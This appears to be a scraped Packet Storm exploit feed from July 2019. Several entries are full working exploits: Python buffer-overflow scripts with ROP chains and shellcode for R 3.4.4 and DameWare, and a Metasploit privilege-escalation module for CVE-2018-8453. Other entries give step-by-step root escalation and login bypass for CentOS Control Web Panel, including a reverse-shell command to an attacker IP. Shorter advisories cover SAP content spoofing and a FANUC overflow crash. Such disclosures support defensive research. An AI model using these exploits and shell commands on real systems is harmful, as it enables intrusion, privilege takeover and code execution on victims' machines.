7.53 Content Spoofing

July 16, 2019, 1:38 pm

≫ Next: R 3.4.4 (Windows 10 x64) Buffer Overflow

≪ Previous: Microsoft Compiled HTML Help / Uncompiled .chm File XML External Entity Injection

SAPUI5 version 1.0.0 and the SAP Gateway versions 7.5, 7.51, 7.52 and 7.53are vulnerable to content spoofing in multiple parameters.

MD5 | 039a38b4ad196a156e5de1ace8468804

Download

[Description]
SAPUI5 1.0.0 and the SAP Gateway versions 7.5, 7.51, 7.52 and 7.53 is
vulnerable to Content Spoofing in multiples parameters.

------------------------------------------
CVE
CVE-2019-0319

------------------------------------------

[Impact]
An attacker could thus mislead a user to believe this information is from
the legitimate service when it's not.

------------------------------------------

[VulnerabilityType Other]
Content Spoofing

------------------------------------------

[Vendor of Product]
SAP

------------------------------------------

[Affected Product]
SAPUI5 1.0.0 and the SAP Gateway versions 7.5, 7.51, 7.52 and 7.53

------------------------------------------

[PoC]
Tested in SAPUI5 1.0.0
PoC:

https://sapmobile.target.com/sap/opu/odata/UI2/INTEROP/PersContainers(category='P
',id='flp.settings.FlpSettings')?$expand=PersContainerItemsu1kpa_HACKED_&sap-cache-id=D49C673A8D0D275477C7CD1FBFA3EE31

------------------------------------------

[Attack Type]
Remote

------------------------------------------

[Reference]
https://capec.mitre.org/data/definitions/148.html
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0319
------------------------------------------

[Discoverer]
Offensive0Labs - Rafael Fontes Souza




References below:
"SAP Product Security Response Team
seg, 8 de jul 04:33 (há 6 dias)
para eu, SAP

Hello Rafael,

We are pleased to inform you that we are releasing the following security
note on July Patch Day 2019:

Sec Incident ID(s)  1870475251

Security Note   2752614

Security Note Title  [CVE-2019-0319] Content Injection Vulnerability in SAP
Gateway

Advisory Plan Date  10/09/2019

Delivery date of fix/Patch Day  07/09/2019

CVSS Base Score  4.3

CVSS Base Vector  NLNR | U | NLN

Credits go to:

Offensive0Labs, Rafael Fontes Souza

*Notes will be visible to customers on 9th of July 2019.

https://wiki.scn.sap.com/wiki/display/PSR/Acknowledgments+to+Security+Researchers

"

Source:packetstormsecurity.com

↧

R 3.4.4 (Windows 10 x64) Buffer Overflow

July 16, 2019, 1:39 pm

≫ Next: DameWare Remote Support 12.0.0.509 Buffer Overflow

≪ Previous: SAPUI5 1.0.0 / SAP Gateway 7.5 / 7.51 / 7.52 / 7.53 Content Spoofing

R version 3.4.4 (Windows 10 x64) SEH buffer overflow exploit with DEP/ASLR bypass.

MD5 | b5210f82925cd36b43862813470c3a0f

Download

#!/usr/bin/python
# Exploit Title: R 3.4.4 (Windows 10 x64) - Buffer Overflow  SEH(DEP/ASLR Bypass)
# Date: 2019-07-15
# Exploit Author: blackleitus
# Vendor Homepage: https://www.r-project.org/
# Tested on: Windows 10 Home Single Language 64-bit
# Social: https://twitter.com/blackleitus
# Website: https://skybulk.github.io/
# discovered by: bzyo


# GUI Preferences -> paste payload.txt into 'Language for menus ...' -> click OK
import struct 

outfile = 'payload.txt'

def create_rop_chain():
    rop_gadgets = [
       0x6c998f58,   # POP EAX # RETN [R.dll] 
       0x6379973c,   # ptr to &VirtualProtect() [IAT methods.dll]
       0x6fee2984,   # MOV EAX,DWORD PTR DS:[EAX] # RETN [grDevices.dll] 
       0x6ca1ba76,   # XCHG EAX,ESI # RETN [R.dll] 
       0x64c45cb8,   # POP ECX # RETN    ** [methods.dll] **   |   {PAGE_EXECUTE_READ}
       0x64c46010,   # &Writable location [methods.dll]
       0x6cacc7e2,   # POP EAX # RETN    ** [R.dll] **   |   {PAGE_EXECUTE_READ}
       0xffffffc0,   # Value to negate, will become 0x00000040
       0x7139c7ba,   # NEG EAX # RETN    ** [stats.dll] **   |   {PAGE_EXECUTE_READ}
       0x6ca3485a,   # XCHG EAX,EDX # RETN    ** [R.dll] **   |   {PAGE_EXECUTE_READ}
       0x7135a862,   # POP EAX # RETN    ** [stats.dll] **   |   {PAGE_EXECUTE_READ}
       0xfffffdff,   # Value to negate, will become 0x00000201
       0x6e7d41ca,   # NEG EAX # RETN    ** [utils.dll] **   |   {PAGE_EXECUTE_READ}
       0x63742597,   # XCHG EAX,EBX # RETN    ** [Rgraphapp.dll] **   |   {PAGE_EXECUTE_READ}
       0x6cbef3c0,   # POP EAX # RETN    ** [R.dll] **   |   {PAGE_EXECUTE_READ}
       0x41414141,   # Filler (compensate)
       0x6c9b1de7,   # POP EBP # RETN    ** [R.dll] **   |   {PAGE_EXECUTE_READ}
       0x6ca2a9bd,   # & jmp esp [R.dll]
       0x6cbebfa6,   # POP EAX # RETN    ** [R.dll] **   |   {PAGE_EXECUTE_READ}
       0x90909090,   # nop
       0x6ca00e93,   # POP EDI # RETN [R.dll] 
       0x6375fe5c,   # RETN (ROP NOP) [Rgraphapp.dll]
       0x6ff1b7bb,   # PUSHAD # RETN [grDevices.dll]
    ]

    return ''.join(struct.pack('<I', _) for _ in rop_gadgets)

rop_chain = create_rop_chain()

junk = "A" * 1016

seh = struct.pack("<L", 0x6cb5f812) # 0x6cb5f812 : {pivot 2988 / 0xbac} :  # ADD ESP,0B9C # POP EBX # POP ESI # POP EDI # POP EBP # RETN    ** [R.dll] **   |   {PAGE_EXECUTE_READ}

# msfvenom -a x86 -p windows/exec -e x86/shikata_ga_nai -b '\x00\x09\x0a\x0d' cmd=calc.exe exitfunc=thread -f python

nops = struct.pack("<L", 0x6cacc7e3) * 30

shellcode =  ""
shellcode += "\x90" * 20
shellcode += "\xdb\xce\xbf\x90\x28\x2f\x09\xd9\x74\x24\xf4\x5d\x29"
shellcode += "\xc9\xb1\x31\x31\x7d\x18\x83\xc5\x04\x03\x7d\x84\xca"
shellcode += "\xda\xf5\x4c\x88\x25\x06\x8c\xed\xac\xe3\xbd\x2d\xca"
shellcode += "\x60\xed\x9d\x98\x25\x01\x55\xcc\xdd\x92\x1b\xd9\xd2"
shellcode += "\x13\x91\x3f\xdc\xa4\x8a\x7c\x7f\x26\xd1\x50\x5f\x17"
shellcode += "\x1a\xa5\x9e\x50\x47\x44\xf2\x09\x03\xfb\xe3\x3e\x59"
shellcode += "\xc0\x88\x0c\x4f\x40\x6c\xc4\x6e\x61\x23\x5f\x29\xa1"
shellcode += "\xc5\x8c\x41\xe8\xdd\xd1\x6c\xa2\x56\x21\x1a\x35\xbf"
shellcode += "\x78\xe3\x9a\xfe\xb5\x16\xe2\xc7\x71\xc9\x91\x31\x82"
shellcode += "\x74\xa2\x85\xf9\xa2\x27\x1e\x59\x20\x9f\xfa\x58\xe5"
shellcode += "\x46\x88\x56\x42\x0c\xd6\x7a\x55\xc1\x6c\x86\xde\xe4"
shellcode += "\xa2\x0f\xa4\xc2\x66\x54\x7e\x6a\x3e\x30\xd1\x93\x20"
shellcode += "\x9b\x8e\x31\x2a\x31\xda\x4b\x71\x5f\x1d\xd9\x0f\x2d"
shellcode += "\x1d\xe1\x0f\x01\x76\xd0\x84\xce\x01\xed\x4e\xab\xee"
shellcode += "\x0f\x5b\xc1\x86\x89\x0e\x68\xcb\x29\xe5\xae\xf2\xa9"
shellcode += "\x0c\x4e\x01\xb1\x64\x4b\x4d\x75\x94\x21\xde\x10\x9a"
shellcode += "\x96\xdf\x30\xf9\x79\x4c\xd8\xd0\x1c\xf4\x7b\x2d"

padding = "D" * (8000-1016-4-30-len(rop_chain)-len(shellcode))

payload = junk + seh + nops + rop_chain + shellcode + padding

with open(outfile, 'w') as file:
  file.write(payload)
print "payload File Created\n"

Source:packetstormsecurity.com

↧

DameWare Remote Support 12.0.0.509 Buffer Overflow

July 16, 2019, 1:39 pm

≫ Next: CentOS Control Web Panel 0.9.8.836 Privilege Escalation

≪ Previous: R 3.4.4 (Windows 10 x64) Buffer Overflow

DameWare Remote Support version 12.0.0.509 Host SEH buffer overflow exploit.

MD5 | a51904aa9c36feff235373043d90d66a

Download

#!/usr/bin/env python
# Author: Xavi Beltran
# Date: 11/07/2019
# Description:
#           SEH based Buffer Overflow
#      DameWare Remote Support V. 12.0.0.509
#      CVE-2018-12897

# Contact: xavibeltran@protonmail.com
# Webpage: https://xavibel.com
# Tested on: Windows XP SP3 ESP

# Credit for Adam Jeffreys from Nettitude! :)

# Usage:
#      Right click on a host >> AMT >> AMT Settings dialog
#      Mark "Use SOCKS proxy" box
#      Paste the string in the Host field

junk  = "\x41" * 1672

# Unicode compatible padding
nseh = "\x61\x43"

# 007A007B - POP POP RET
seh = "\x7B\x7A"

align  = ""
align += "\x05\x20\x11"       # add eax,0x11002000
align += "\x71"               # Venetian Padding
align += "\x2d\x19\x11"       # sub eax,0x11001900
align += "\x71"               # Venetian Padding
align += "\x50"               # push eax
align += "\x71"               # Venetian Padding
align += "\xC3"               # RETN

padding = "\x41" * 11

junk2 = "\x41" * 870
junk3 = "\x41" * 2014

# msfvenom -p windows/exec CMD=calc -f raw > shellcode.raw
# ./alpha2 eax --unicode --uppercase < shellcode.raw
# 508 bytes
shellcode = "PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBKLYX4BM0M0KPQP4IZEP17PQTDKPPNPTK1BLLDK1BLTTKT2MXLOVWPJMV01KO6LOLS13LM2NLMPWQHOLMM1WWK2KBPR27TKPRLP4K0JOLTK0LN1D8K3OXKQJ1R1TKPYMPM1HS4KPILXYSOJQ9DKOD4KM1XVNQKO6LGQ8OLMM1WWP89PRUZVLCSMKHOKSMMT2UJD1HDKQHNDKQJ31VTKLL0K4K1HMLM1J3DKKTTKM1HP3YQ4O4ND1K1KQQR9PZ0QKOYPQOQOQJDKLRZKTM1MRJM1DMCUH2KPKPKPPPQXP1TKBOU7KOHUWKL07EFB0V38W6V5WMUMKOJ5OLM63LLJ3PKKIP2UKUWK17MCBRROQZM0B3KOZ51S1Q2LQSKPA"


crash = junk + nseh + seh + padding + align + junk2 + shellcode + junk3

print(crash)

Source:packetstormsecurity.com

↧

CentOS Control Web Panel 0.9.8.836 Privilege Escalation

July 16, 2019, 1:40 pm

≫ Next: CentOS Control Web Panel 0.9.8.836 Authentication Bypass

≪ Previous: DameWare Remote Support 12.0.0.509 Buffer Overflow

CentOS Control Web Panel version 0.9.8.836 suffers from a privilege escalation vulnerability.

MD5 | a9210bf1e43adfc4a34316bfb77c32ed

Download

//====================================================================\\
||                                                                     ||
||           CWP Control Web Panel 0.9.8.836 - 0.9.8.839               ||
||                     Root Privilege Escalation                       ||
||                                                                     ||
\\====================================================================//

# ====================================================================
# Information
# ====================================================================
# Exploit Title: CWP (CentOS Control Web Panel) < 0.9.8.40 Root Privilege Escalation
# Date: 6 July 2019
# Exploit Author: Pongtorn Angsuchotmetee, Nissana Sirijirakal, Narin Boonwasanarak
# Vendor Homepage: https://control-webpanel.com/changelog
# Software Link: http://centos-webpanel.com/cwp-el7-latest (Have to change
version in the script)
# Version: 0.9.8.836 to 0.9.8.839
# Tested on: CentOS 7.6.1810 (Core)
# CVE : CVE-2019-13359

Product             : CWP Control Web Panel
Vulnerability Name  : Root Privilege Escalation
version             : 0.9.8.836
Fixed on            : 0.9.8.840
Test on             : Tested on: CentOS 7.6.1810 (Core)
Reference           : http://centos-webpanel.com/
                    : https://control-webpanel.com/changelog
CVE-Number          : CVE-2019-13359


# ====================================================================
# Root course of the vulnerability
# ====================================================================
1. The session file are store at /tmp directory
2. rkey value in the session file dose not change when access by the same source IP address



# ====================================================================
# Steps to Reproduce
# ====================================================================

Session prepareation state
    1. Check the current IP address of attacker
    2. Set the IP address on testing environment network
    3. Login as root on port 2031/2087 and save the cookie name from web browser (cwsrp-xxxxxxxxxxxxxxxxxxxxx)
    4. Copy the content of session file (/tmp/sess_xxxxxxxxxxxxxx) to a new file "sess_123456"                  # we need "rkey"
    5. Save the token value from the session file (cwp_xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx)

    * rkey is created from client ip, then do not change client ip when attack the real target

Attack state

    #
    #   Method 1 Uploading via reverse shell
    #

    1. Go to crontab and set "bash -i >& /dev/tcp/[Attacker-IP]/8000 0>&1"
    2. Create session file through reverse shell

        echo "username|s:4:\"root\";logged|b:1;rkey|s:20:\"[RKEY]\";token|s:36:\"[TOKEN-KEY]\";"> /tmp/sess_123456

    3. On another browser, replace the token value in the URL https://[target.com]:2031/cwp_xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx/admin/index.php
    4. Change file permission "chmod 664 /tmp/sess_123456"
    5. Create cookie name "cwsrp-xxxxxxxxxxxxxxxxxxxxx" and set its value to "123456" (sess_123456)
    6. Open the URL and become the root user


    #
    # Method 2 Uploading via File manager function
    #

    1. On the real target, login as a normal user on port 2083 and upload file "sess_123456" to /tmp directory and set permission to 644 (chmod 664 /tmp/sess_123456) via crontab feature
    2. On another browser, replace the token value in the URL https://[target.com]:2031/cwp_xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx/admin/index.php
    3. Create cookie name "cwsrp-xxxxxxxxxxxxxxxxxxxxx" and set its value to "123456" (sess_123456)
    4. Open the URL and become the root user

    *From step 1 - 4 need doing it quickly. if we do it too slow, the application will change the permission of file sess_123456 to 600, and the file will become 0 byte. If this happened, attacker need to change session file name and repeat the steps again



# ====================================================================
# PoC
# ====================================================================
https://github.com/i3umi3iei3ii/CentOS-Control-Web-Panel-CVE/blob/master/CVE-2019-13359.md



# ====================================================================
# Timeline
# ====================================================================
2019-06-30: Discovered the bug
2019-06-30: Reported to vendor
2019-06-30: Vender accepted the vulnerability
2019-07-02: The vulnerability has been fixed
2019-07-06: Published



# ====================================================================
# Discovered by
# ====================================================================
Pongtorn Angsuchotmetee
Nissana Sirijirakal
Narin Boonwasanarak

Source:packetstormsecurity.com

↧

CentOS Control Web Panel 0.9.8.836 Authentication Bypass

July 16, 2019, 1:40 pm

≫ Next: CentOS Control Web Panel 0.9.8.838 User Enumeration

≪ Previous: CentOS Control Web Panel 0.9.8.836 Privilege Escalation

CentOS Control Web Panel version 0.9.8.836 suffers from an authentication bypass vulnerability.

MD5 | 010e4c768075759ac870b22afd37ce05

Download

# Exploit Title: CWP (CentOS Control Web Panel) < 0.9.8.847 Bypass Login
# Date: 6 July 2019
# Exploit Author: Pongtorn Angsuchotmetee
# Vendor Homepage: https://control-webpanel.com/changelog
# Software Link: Not available, user panel only available for latest version
# Version: 0.9.8.836 to 0.9.8.846
# Tested on: CentOS 7.6.1810 (Core)
# CVE : CVE-2019-13360, CVE-2019-13605

# ====================================================================
# Information
# ====================================================================

Product             : CWP Control Web Panel
Vulnerability Name  : User panel bypass Login
version             : 0.9.8.836
Fixed on            : 0.9.8.848
Test on             : CentOS 7.6.1810 (Core)
Reference           : http://centos-webpanel.com/
                    : https://control-webpanel.com/changelog
CVE-Number          : CVE-2019-13605


# ====================================================================
# Root course of the vulnerability
# ====================================================================
After login success, the application will retuens base64 value and use it to authenticate again,
That allow attacker to modify the response and become a user

# ====================================================================
# Response format (version 0.9.8.836 to 0.9.8.837)
# ====================================================================

<username>||/<username>/theme/original



# CVE-2019-13360
# ====================================================================
# Steps to Reproduce Version 0.9.8.836 to 0.9.8.837
# ====================================================================

1. Login with valid username and invalid password
2. Replace the target username in "<username>||/<username>/theme/original"
3. Convert to base64
4. Place the base64 value to HTTP response body
5. Gain access to user area


# CVE-2019-13605
# ====================================================================
# Steps to Reproduce Version 0.9.8.838 to 0.9.8.846
# ====================================================================

1. Create a testing environment
  1.1 Create user as a target username
  1.2 Login as the user
  1.3 Save the HTTP response body (token value)
2. Login to the real target with valid username and invalid password
3. Place the value we saved from step 1.3 in HTTP response body
4. Gain access to user area

*The response value format is depends on version, just replace the hole value



# ====================================================================
# PoC
# ====================================================================
https://github.com/i3umi3iei3ii/CentOS-Control-Web-Panel-CVE/blob/master/CVE-2019-13360.md
https://github.com/i3umi3iei3ii/CentOS-Control-Web-Panel-CVE/blob/master/CVE-2019-13605.md



# ====================================================================
# Timeline
# ====================================================================
2019-07-07: Discovered the bug
2019-07-07: Reported to vendor
2019-07-07: Vender accepted the vulnerability
2019-07-11: The vulnerability has been fixed
2019-07-15: Advisory published



# ====================================================================
# Discovered by
# ====================================================================
Pongtorn Angsuchotmetee

Source:packetstormsecurity.com

↧

CentOS Control Web Panel 0.9.8.838 User Enumeration

July 16, 2019, 1:41 pm

≫ Next: Linux PTRACE_TRACEME Broken Permission / Object Lifetime Handling

≪ Previous: CentOS Control Web Panel 0.9.8.836 Authentication Bypass

CentOS Control Web Panel version 0.9.8.838 suffers from a user enumeration vulnerability.

MD5 | c0097370579f6ba471afee6e2a345e0b

Download

# Exploit Title: CWP (CentOS Control Web Panel) < 0.9.8.848 User Enumeration via HTTP Response Message
# Date: 15 July 2019
# Exploit Author: Pongtorn Angsuchotmetee, Nissana Sirijirakal, Narin Boonwasanarak
# Vendor Homepage: https://control-webpanel.com/changelog
# Software Link: Not available, user panel only available for lastest version
# Version: 0.9.8.836 to 0.9.8.847
# Tested on: CentOS 7.6.1810 (Core)
# CVE : CVE-2019-13383

# ====================================================================
# Information
# ====================================================================

Product     : CWP Control Web Panel
version     : 0.9.8.838
Fixed on    : 0.9.8.848
Test on     : CentOS 7.6.1810 (Core)
Reference   : https://control-webpanel.com/
CVE-Number  : 2019-13383



# ====================================================================
# Root course of the vulnerability
# ====================================================================
The server response different message between login with valid and invalid user.
This allows attackers to check whether a username is valid by reading the HTTP response.



# ====================================================================
# Steps to Reproduce
# ====================================================================

1. Login with a random user by using invalid password

POST /login/index.php?acc=validate HTTP/1.1
Host: 192.168.80.137:2083
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
csrftoken: d41d8cd98f00b204e9800998ecf8427e
X-Requested-With: XMLHttpRequest
Content-Length: 30
Connection: close
Referer: https://192.168.80.137:2083/login/?acc=logon

username=AAA&password=c2Rmc2Rm



2. Check the HTTP response body

2.1 User does not exist (server response suspended)

HTTP/1.1 200 OK
Server: cwpsrv
Date: Mon, 15 Jul 2019 01:39:06 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/7.0.32
Content-Length: 9

suspended


2.2 User does exist (server response nothing)

HTTP/1.1 200 OK
Server: cwpsrv
Date: Mon, 15 Jul 2019 01:40:12 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/7.0.32
Content-Length: 0



3. HTTP response body format depends on software version, but all of them keep responding differently as the example below

------------------------------------------------------------
|  Username  |   Password   |   Result                     |

------------------------------------------------------------
|  valid     |   valid      |   login success              |

|  valid     |   invalid    |  {"error":"failed"}         |

|  invalid   |   invalid    |  {"error":"user_invalid"}   |
------------------------------------------------------------



# ====================================================================
# PoC
# ====================================================================
https://github.com/i3umi3iei3ii/CentOS-Control-Web-Panel-CVE/blob/master/CVE-2019-13383.md



# ====================================================================
# Timeline
# ====================================================================
2019-07-06: Discovered the bug
2019-07-06: Reported to vendor
2019-07-06: Vender accepted the vulnerability
2019-07-11: The vulnerability has been fixed
2019-07-15: Published



# ====================================================================
# Discovered by
# ====================================================================
Pongtorn Angsuchotmetee
Nissana Sirijirakal
Narin Boonwasanarak

Source:packetstormsecurity.com

↧

Linux PTRACE_TRACEME Broken Permission / Object Lifetime Handling

July 16, 2019, 1:41 pm

≫ Next: Microsoft Windows NtUserSetWindowFNID Win32k User Callback

≪ Previous: CentOS Control Web Panel 0.9.8.838 User Enumeration

Linux suffers from broken permission and object lifetime handling for PTRACE_TRACEME.

MD5 | 91c78e7e5a824d9c7ed235f47eecb190

Download

Source:packetstormsecurity.com

↧

Microsoft Windows NtUserSetWindowFNID Win32k User Callback

July 16, 2019, 1:42 pm

≫ Next: FANUC Robotics Virtual Robot Controller 8.23 Buffer Overflow

≪ Previous: Linux PTRACE_TRACEME Broken Permission / Object Lifetime Handling

An elevation of privilege vulnerability exists in Microsoft Windows when the Win32k component fails to properly handle objects in memory. This affects Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2008, Windows Server 2019, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2, Windows 10, Windows 10 Servers. This Metasploit module is tested against Windows 10 v1703 x86.

MD5 | 410d26c4ad5d959638a9e5d77947143e

Download

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = ManualRanking

  include Msf::Post::File
  include Msf::Exploit::EXE
  include Msf::Post::Windows::Priv
  include Msf::Exploit::FileDropper

  def initialize(info={})
    super(update_info(info,
'Name'            => 'Windows NtUserSetWindowFNID Win32k User Callback',
'Description'     => %q{
        An elevation of privilege vulnerability exists in Windows when the Win32k component
        fails to properly handle objects in memory, aka "Win32k Elevation of Privilege Vulnerability."
        This affects Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2008, Windows
        Server 2019, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2,
        Windows 10, Windows 10 Servers.

        This module is tested against Windows 10 v1703 x86.
      },
'License'         => MSF_LICENSE,
'Author'          => [
'ze0r',           # Exploit analysis and PoC
'Kaspersky Lab',  # Vulnerability discovery/detection
'Jacob Robles'    # Metasploit module
      ],
'Platform'        => 'win',
'Arch'            => ARCH_X86,
'SessionTypes'    => [ 'meterpreter' ],
'DefaultOptions'  => {
'EXITFUNC'    => 'thread'
      },
'Targets'         => [
        [ 'Windows 10 v1703 (Build 15063) x86', {
'UniqueProcessIdOffset' => 180,
'TokenOffset' => 252,
'Version' => 'Windows 10 (Build 15063)'
          }
        ]
      ],
'References'      => [
        ['CVE', '2018-8453'],
        ['URL', 'https://github.com/ze0r/cve-2018-8453-exp'],
        ['URL', 'https://mp.weixin.qq.com/s/ogKCo-Jp8vc7otXyu6fTig'],
        ['URL', 'https://mp.weixin.qq.com/s/dcbUeegM0BqErtDufOXfoQ'],
        ['URL', 'https://securelist.com/cve-2018-8453-used-in-targeted-attacks/88151/'],
        ['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8453']
      ],
'Notes' => {
'SideEffects' => [ARTIFACTS_ON_DISK, SCREEN_EFFECTS],
'Stability'   => [CRASH_OS_RESTARTS]
      },
'DisclosureDate'  => '2018-10-09',
'DefaultTarget'   => 0
    ))
  end

  def target_info
    fail_with(Failure::None, 'Session is already elevated') if is_system?

    unless sysinfo['OS'].start_with?(target['Version']) && sysinfo['Architecture'] == 'x86'
      fail_with(Failure::NoTarget, 'Target is not compatible with exploit')
    end
  end

  def write_file_to_target(fname, data)
    tempdir = session.sys.config.getenv('TEMP')
    file_loc = "#{tempdir}\\#{fname}"
    vprint_warning("Attempting to write #{fname} to #{tempdir}")
    write_file(file_loc, data)
    vprint_good("#{fname} written")
    file_loc
  rescue Rex::Post::Meterpreter::RequestError => e
    elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
    fail_with(Failure::Unknown, "Writing #{fname} to disk was unsuccessful")
  end

  def exploit
    target_info
    exe_name = 'CVE-2018-8453.exe'
    exe_path = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-8453', exe_name)
    vprint_status("Reading payload from file #{exe_path}")
    raw = File.read(exe_path)

    tmp_exe = "#{Rex::Text.rand_text_alphanumeric(10)}.exe"
    vprint_status("Uploading exploit exe as: #{tmp_exe}")
    exe_rpath = write_file_to_target(tmp_exe, raw)
    register_file_for_cleanup(exe_rpath)

    tmp_payload = "#{Rex::Text.rand_text_alpha(6..14)}.exe"
    payload_rpath = write_file_to_target(tmp_payload, generate_payload_exe)
    vprint_status("Uploading payload #{tmp_payload}")
    register_file_for_cleanup(payload_rpath)

    command = "\"#{exe_rpath}\" \"#{payload_rpath}\" #{target['UniqueProcessIdOffset']} #{target['TokenOffset']}"

    vprint_status("Executing command: #{command}")
    session.sys.process.execute(command, nil, {'Hidden' => false})
    print_good('Exploit finished, wait for privileged payload execution to complete.')
  end
end

Source:packetstormsecurity.com

↧

FANUC Robotics Virtual Robot Controller 8.23 Buffer Overflow

July 16, 2019, 1:43 pm

≫ Next: FANUC Robotics Virtual Robot Controller 8.23 Path Traversal

≪ Previous: Microsoft Windows NtUserSetWindowFNID Win32k User Callback

FANUC Robotics Virtual Robot Controller version 8.23 suffers from a stack-based buffer overflow vulnerability.

MD5 | 24accc856caa22d0d70441294d2efb6a

Download


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID: SYSS-2019-024
Product: FANUC Robotics Virtual Robot Controller
Manufacturer: FANUC Robotics America, Inc.
Affected Version(s): V8.23
Tested Version(s): V8.23
Vulnerability Type: Stack-based Buffer Overflow (CWE-121) 
Risk Level: High
Solution Status: Open
Manufacturer Notification: 2019-05-22
Solution Date: ?
Public Disclosure: 2019-07-15
CVE Reference: CVE-2019-13585
Author of Advisory: Sebastian Hamann, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

FANUC Robotics Virtual Robot Controller is an application for
programming simulated industry robots.

Due to a stack-based buffer overflow, the remote admin web server
(vrimserve.exe) is vulnerable to denial-of-service and remote code
execution attacks.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

vrimserve.exe offers an HTTP service on TCP port 8090, which can be used
to control virtual robots and view their log files.

A buffer overflow vulnerability was discovered in the log viewer
functionality. By sending a specially crafted HTTP request to the HTTP
server, the application can be crashed causing a denial-of-service
condition.

Remote code execution may also be possible, but was not confirmed
by SySS GmbH. Gaining control over the instruction pointer (EIP) of this
32 bit application by exploiting the stack-based buffer overflow
vulnerability was successful.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

SySS GmbH developed a proof-of-concept exploit that crashes
vrimserve.exe. It is to note that the exploit gives control over the EIP
register, which is an important prerequisite for remote code execution.

curl "http://${target_host}:8090/namedrobots/folder/dir/<1268 bytes>BBBBCCCCCCCCC"

The bytes denoted as B overwrite the EIP register.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

The vendor has not yet released a security update.

It is recommended not making the remote admin web server (vrimserve.exe)
available to untrusted networks.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2019-04-23: Vulnerability discovered
2019-05-22: Vulnerability reported to manufacturer
2019-07-15: Public release of SySS security advisory

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Manufacturer website:
    https://www.fanucamerica.com/
[2] SySS Security Advisory SYSS-2019-024
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2019-024.txt
[3] SySS Responsible Disclosure Policy
    https://www.syss.de/en/news/responsible-disclosure-policy/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Sebastian Hamann of SySS GmbH.

E-Mail: sebastian.hamann@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Sebastian_Hamann.asc
Key ID: 0x9CE0E440429D8B96
Key Fingerprint: F643 DF21 62C4 7C53 7DB2 8BA1 9CE0 E440 429D 8B96

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS Web
site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEE9kPfIWLEfFN9souhnODkQEKdi5YFAl0snAwACgkQnODkQEKd
i5ZIqw//bdjzLHzqTtVHEnqFDORa1xmD9478c/57WBKW+kVH/NMupv5CwjsFEJvq
hhY/Ju1Yl+m0kz3R+orHKgUw6VTdfAiogOS/OIW+8yozUQ1lPRDhKcKe/Ai2X2kj
/A/y8mgR43AX2ddcf6tr5XeOeJHgzK3Up8y0fbkvRPQ7aszzWRYCQr4CmXtSsaAf
qxg5fzBwzVEHhDni/tBe6bCqBmV9r+4yi0L2BGV+Cxo08gbsLkAiIhUHJnLG1GbM
mKYFk7v+8JecXEIu12ZiH8Zofn9p2ePeQw/u64VsuUJ+dCJMlyLeAOgXpQiIIt8z
dNj5MS6w37b+4Dc/C7mlfDb9GPGGMyhyK5+TX8KT5LG1MVOyYocnbrD23xSRNSAi
8HhLszTyXcXwkKhsRWelvrEcxaiIsm5y0/4X2gJ/PeTkZNlOPgyD3xv7bth3jUYK
Bcb7NSgp+5FZcaG/moT1W5zL7WFj9wnFd2w4glIPVDUtgy5FQM0cdnGNr1KNvqZB
Esn3Tylbmzt7uQKuT/pZOFk1QQ8VoSnPmyWB6tyBFhTCZxfR+V+MKTIPrCFjrvpQ
